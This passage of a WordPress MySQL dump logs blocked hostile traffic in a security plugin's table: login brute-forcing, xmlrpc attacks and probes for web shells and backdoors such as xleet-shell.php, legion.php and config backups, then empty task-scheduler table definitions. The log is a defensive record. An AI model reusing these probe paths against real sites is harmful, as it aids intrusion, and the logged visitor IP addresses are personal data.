Safari\\/537.36\"}','sGF0TL7WhONJY6xMXe1ZPbjB',0,1665888394.6550,492,'','POST',403,0,515,0,1,'',0),('205.185.117.143',3451483535,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','G42V7vBDIkcUAK6fp15F8nuS',0,1665888588.3427,1213,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VtrScm4ujhEbyJMITe2nBWiR',0,1665889122.7860,17734,'','POST',403,0,515,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jidIPx3uzgUKlZhvkqr5BW4M',0,1665889122.8271,17766,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QHbjmy8PEDB5VoK2kAS6f7eX',0,1665889493.9472,14638,'','POST',403,0,515,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XfVa7ogOpStwMrNP5eYs3njT',0,1665889490.9345,17683,'','POST',403,0,515,0,1,'',0),('185.200.116.203',3116922059,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LDTZfc3EoqOPy2vpnhVjMwCI',0,1665974193.5663,18453,'','POST',403,0,515,0,1,'',0),('46.63.80.162',775901346,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','HohKBxRdFl0ETguz8fyPZraA',0,1665974669.7431,1851,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','km92MoGrdslwZvb3Vt0QqHec',0,1665974703.3537,17591,'','POST',403,0,600,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QxM72izlt0BwecVZfHGWTqOU',0,1666061280.8191,3417,'','POST',403,0,515,0,1,'',0),('51.91.18.43',861606443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LwyoBpPMtTzAJs8QVgjCdZ92',0,1666062772.8813,22716,'','POST',403,0,515,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','51crAakqgQYLK8ZWlb9yi0oO',0,1666076510.2076,286,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SwmDyINpK4XQz7HarqT82ngP',0,1666076960.4815,1167,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ohdY3bMqCxW9E0f8DKsXAgHl',0,1666076975.5918,332,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZCEJKvyfBuRheTxFD9oAj7Qd',0,1666076981.3435,306,'','POST',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IyRgNujcHSksX3qw1T9aOKr2',0,1666077011.9653,480,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7FusJdPO1hqWUktKmZg09bVl',0,1666077016.4264,539,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DJNz9PdeWEiArc0MjLSZFyXl',0,1666077035.3373,7189,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UGgOHfMC73RkFhXrtd4DjqAy',0,1666077045.8986,351,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Wem8Fy2cEY4KGSZloMNwXBbr',0,1666077052.1646,318,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BGPVvDAEs1ikXUx0Hf7LFZeS',0,1666077062.6549,372,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nrTQtLZiPuJW7b9pgANIDv84',0,1666077083.2627,367,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Tjorua85lZ9w1evRUmyOkSIP',0,1666077092.3159,380,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lKB5pc1hPQXtL7bR8q6U4NZT',0,1666077097.8307,280,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','9XZU2wx63evHdJyLIm7FE5tW',0,1666077142.9827,1323,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/xleet.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_0_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','hTSycCIDgu27xo8Z1OLP59bJ',0,1666077143.0034,2088,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/sh3llx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.77 Safari\\/537.36\"}','7jcb6usgxiByQEOfaHYqCDAN',0,1666077144.0850,2704,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/takeout.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko\\/20100101 Firefox\\/62.0\"}','0MAkasOpu8w2JxPcU56QETRt',0,1666077144.1862,2698,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/jindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','gD5hEjkBKzsbyqcFftaGSTUi',0,1666077146.0909,1811,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; Mi Note 10 Pro) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.106 Mobile Safari\\/537.36\"}','UvCe7KLBFio83QjT0PMSg5DI',0,1666077146.1987,1810,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/xlet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.111 Safari\\/537.36\"}','aRoICVYj1uiyZWmwgJ2hHdkS',0,1666077146.1020,1984,'','GET',403,0,700,0,1,'',0),('87.249.38.253',1475946237,'','http://cteisys.com/xltavrat.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_0_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/14.0 Mobile\\/15E148 Safari\\/604.1\"}','rAPfIdk6FR9eZYLlbO04tXoB',0,1666077146.0869,2029,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rtylp9Z0PWshVdKJS4nkwXFN',0,1666077219.5907,291,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YEC5QPyA9Jwt46kzZmbaIOoL',0,1666077357.6516,11549,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CDfeQLgRuvE8AH9XjdoJhOBi',0,1666077473.8653,1010,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sfbpmYAgq75CHUJN1wjyid9O',0,1666077504.0908,334,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8e3frjFi7toR0JMdTVqKbmLG',0,1666077558.3798,375,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3xh2LlvgOjdGQkIYbDoETfNp',0,1666077666.4550,11593,'','GET',403,0,700,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bK08n9fH5uyokGsicpUrxQ4v',0,1666077937.9319,1905,'','POST',403,0,515,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G8CXL9Dg2HWJKBRberdN64O5',0,1666078316.4556,2513,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nM9UrWhwGvm0jfDJcFX4uP3T',0,1666078651.2836,18713,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IYf1qV0RgKO5FGnQBZA3yJpo',0,1666079737.9692,18318,'','POST',403,0,515,0,1,'',0),('185.2.4.33',3103917089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','yAswivX7u1hz5xZqtn0PBG2l',0,1666146064.3043,18294,'','POST',403,0,600,0,1,'',0),('146.56.99.136',2453169032,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','T6rNVJC8uE4B5DzFGkUqemQS',0,1666148314.9066,17318,'','POST',403,0,600,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-content/themes/pridmag/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','wZWfhtcoK65linPQrDaCx1kE',0,1666233339.9879,335,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-content/themes/seotheme/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','nVPuBq8N0kThcQvUtZMeom1b',0,1666233343.8799,446,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','42bW9IA6lidyarOBpZvKXuMY',0,1666233347.7368,302,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','DtFeyXKvnb2RMz8oJ5fk7HOT',0,1666233351.5914,297,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','O4Gw6iKgkScFZYH8uWC5fRdl',0,1666233355.1884,324,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','i4TgYL2kB76ashnUAM3ZcE5K',0,1666233358.9005,460,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kEsmGi3NaOpxlZeVU6HTMdnt',0,1666233363.3320,343,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','x5Ohi7tWsFVdHUC4P3o8yv9I',0,1666233368.9580,313,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','m2yl8TCB0VjzLFPSf9o3HtUw',0,1666233372.9624,341,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9u7kMaNpXbO1zHfWdgUyAQ3t',0,1666233377.2524,318,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','g3PqsZBuRJzVxUchYbfD1C8W',0,1666233381.3999,305,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','PLvGgJTfkFzIV4tcBio25UmH',0,1666233384.9199,324,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9m7Cu0Zo5HJRWatQrOGnkUpY',0,1666233388.7529,291,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2dDAUuVk8lcJn1HQYING6ZP0',0,1666233392.0474,311,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','J4WuFEfPkQeoXNLqYwRGI0v5',0,1666233395.5655,303,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-admin/js/widgets/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','BhVcljpnFuydwR8X1oGxK7T3',0,1666233400.8389,308,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-admin/css/colors/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','D7voq5IGVMJwkK3HjnPcreY0',0,1666233404.7585,291,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','nWpQZmtkbeNcPBV4ELiX78q5',0,1666233408.5402,271,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gidGVhKNBTHtao5wUIYWmqXx',0,1666233411.7995,308,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-admin/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','B10lcVFSEijgLMq9T2GZH3vR',0,1666233416.5686,314,'','GET',403,0,700,0,1,'',0),('135.125.183.202',2273163210,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Ii8ZVw1c9mbQqpC4tyk6X3Ph',0,1666233421.1145,274,'','GET',403,0,700,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','hP48e3NVmHJ7Wk5sxBRqF2fr',0,1666238109.4307,773,'','POST',403,0,600,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','JI1bslCZdNqSKaMVyrnc2tGx',0,1666238114.5320,501,'','POST',403,0,600,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','BD4eYWQunoSq8fIaTLK2j1VE',0,1666238119.3788,1976,'','POST',403,0,600,0,1,'',0),('89.248.165.195',1509467587,'','https://cteisys.com/wp-login.php','','{\"1\":\"fasthttp\"}','xFTQIRBbtjH0vqmXsEMSAOLo',0,1666238125.5947,503,'','POST',404,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','o5fXdVrnkGKTsRz7YZJbj0Uv',0,1666238972.5938,7304,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','KISFnLZQGfzmTEXvoucgxjaP',0,1666240832.3696,6065,'','POST',403,0,600,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wp0y_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `schedule` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id` (`claim_id`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=427 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_actionscheduler_actions`
--

LOCK TABLES `wp0y_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wp0y_actionscheduler_actions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wp0y_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=13284 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_actionscheduler_claims`
--

LOCK TABLES `wp0y_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wp0y_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wp0y_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_actionscheduler_groups`
--

LOCK TABLES `wp0y_actionscheduler_groups` WRITE;
/*!40000 ALTER TABLE `wp0y_actionscheduler_groups` DISABLE KEYS */;
INSERT INTO `wp0y_actionscheduler_groups` VALUES (1,'action-scheduler-migration');
/*!40000 ALTER TABLE `wp0y_actionscheduler_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wp0y_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
